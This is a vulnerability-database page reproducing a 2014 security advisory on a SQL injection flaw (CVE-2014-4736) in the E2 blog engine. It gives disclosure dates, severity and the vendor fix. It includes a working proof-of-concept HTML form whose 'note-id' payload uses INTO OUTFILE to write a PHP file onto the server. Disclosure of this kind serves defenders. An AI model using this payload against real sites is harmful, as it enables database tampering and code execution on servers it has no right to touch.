Lucene search
K

E2 2844 SQL Injection Vulnerability

🗓️ 24 Jul 2014 00:00:00Reported by High-Tech BridgeType 
zdt
 zdt
🔗 0day.today👁 37 Views

SQL Injection Vulnerability in E2 v284

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-4736
23 Jul 201400:00
circl
CVE
CVE-2014-4736
24 Jul 201414:00
cve
Cvelist
CVE-2014-4736
24 Jul 201414:00
cvelist
EUVD
EUVD-2014-4655
7 Oct 202500:30
euvd
htbridge
SQL Injection in Е2
2 Jul 201400:00
htbridge
NVD
CVE-2014-4736
24 Jul 201414:55
nvd
Packet Storm
E2 2844 SQL Injection
23 Jul 201400:00
packetstorm
Prion
Sql injection
24 Jul 201414:55
prion
securityvulns
SQL Injection in Е2
15 Oct 201400:00
securityvulns
securityvulns
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
15 Oct 201400:00
securityvulns
Rows per page
Product: Е2 
Vendor: Ilya Birman
Vulnerable Version(s): v2844 and probably prior
Tested Version: v2844
Advisory Publication:  July 2, 2014  [without technical details]
Vendor Notification: July 2, 2014 
Vendor Patch: July 3, 2014 
Public Disclosure: July 23, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-4736
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in Е2, which can be exploited to perform SQL injection attacks and gain control over the vulnerable application.


1) SQL Injection in Е2: CVE-2014-4736

The vlnerability exists due to insufficient sanitization of input data passed via the "note-id" HTTP POST parameter to "/@actions/comment-process" URI. A remote attacker can send a specially crafted HTTP POST request, inject and execute arbitrary SQL commands in application’s database. Successful exploitation of the vulnerability may allow an attacker to add, modify or delete arbitrary records in database and gain complete access to the web site.

PoC code below will create a PHP file "/var/www/file.php", containing "phpinfo()" call (if the filesystem permissions and MySQL configuration allow it):


<form action="http://[host]/@actions/comment-process" method="post" name="main">
<input type="hidden" name="already-subscribed" value="">
<input type="hidden" name="comment-id" value="new">
<input type="hidden" name="elton-john" value="1">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="from" value="">
<input type="hidden" name="name" value="name">
<input type="hidden" name="subscribe" value="on">
<input type="hidden" name="text" value="1">
<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Update to Е2 version v2845

More Information:
http://blogengine.ru/download/

#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation